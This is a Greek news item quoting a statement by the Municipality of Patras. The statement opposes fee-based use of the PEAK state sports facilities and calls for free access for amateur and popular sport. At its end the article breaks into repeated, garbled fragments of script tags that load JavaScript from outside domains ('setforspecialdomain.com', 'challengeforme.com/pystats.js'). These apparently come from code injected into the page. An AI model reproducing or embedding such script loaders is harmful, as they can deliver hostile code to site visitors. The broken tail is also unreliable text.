Δ. Πατρέων: Ανοιχτό το ΠΕΑΚ για τον λαό και τη νεολαία της Πάτρας

Σχετικά με τη λειτουργία του Παμπελοποννησιακού Εθνικού Αθλητικού Κέντρου, ο Δήμος Πατρέων εξέδωσε την ακόλουθη ανακοίνωση:

“Πληροφορηθήκαμε από τα τοπικά μέσα ενημέρωσης, ότι η διοίκηση του Παμπελοποννησιακού Εθνικού Αθλητικού Κέντρου (ΠΕΑΚ), επιχείρησε την πρόωρη ανανέωση των συμφωνητικών χρήσης με ερασιτεχνικά αθλητικά σωματεία των, υπό τη δικαιοδοσία της, κρατικών αθλητικών εγκαταστάσεων «Τόφαλος», «Πεπανός», «Κουκούλι» που βρίσκονται εντός των ορίων του Δήμου Πατρέων, με βάση τα προβλεπόμενα από το νόμο ιδιωτικοοικονομικά κριτήρια ανταποδοτικού αντιλαϊκού χαρακτήρα.

Το γεγονός αυτό προκάλεσε τη δημόσια οργισμένη αντίδραση του υπεύθυνου αθλητισμού της τοπικής οργάνωσης του κυβερνώντος κόμματος.

Η τοπική οργάνωση του ΣΥΡΙΖΑ εκτόνωσε όλη την οργή της στους τύπους και τις διαδικασίες δηλ. στο περιτύλιγμα, αποφεύγοντας να τοποθετηθεί επί της ουσίας του ζητήματος, που είναι βέβαια ο αντιλαϊκός χαρακτήρας της εμπορευματικής λειτουργίας των κρατικών αθλητικών υποδομών (το πολύ απλό και απαράδεκτο ότι ο Πατραϊκός λαός πληρώνει για να αθλείται σε γήπεδα που φτιάχτηκαν με δικά του χρήματα!).

Με άλλα λόγια ακόμα κι αν η τωρινή διοίκηση του ΠΕΑΚ επιδεικνύοντας «υπερπατριωτισμό» φτιάξει συμφωνητικά πριν την ώρα τους, αυτό που έχει σημασία είναι η θέση της νέας κυβέρνησης για τους όρους λειτουργίας του ΠΕΑΚ, αλλά και όλων των κρατικών αθλητικών υποδομών.

Η Δημοτική Αρχή υποστηρίζει, προβάλλει και αναδεικνύει ΤΗΝ κατάργηση των ιδιωτικοοικονομικών κριτηρίων λειτουργίας των κρατικών αθλητικών υποδομών και την εξασφάλιση δωρεάν πρόσβασης του ερασιτεχνικού σωματειακού και του μαζικού λαϊκού αθλητισμού.

Στην κατεύθυνση αυτή, ο Δήμος Πατρέων θα αναλάβει σχετικές πρωτοβουλίες στο άμεσο μέλλον.”___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >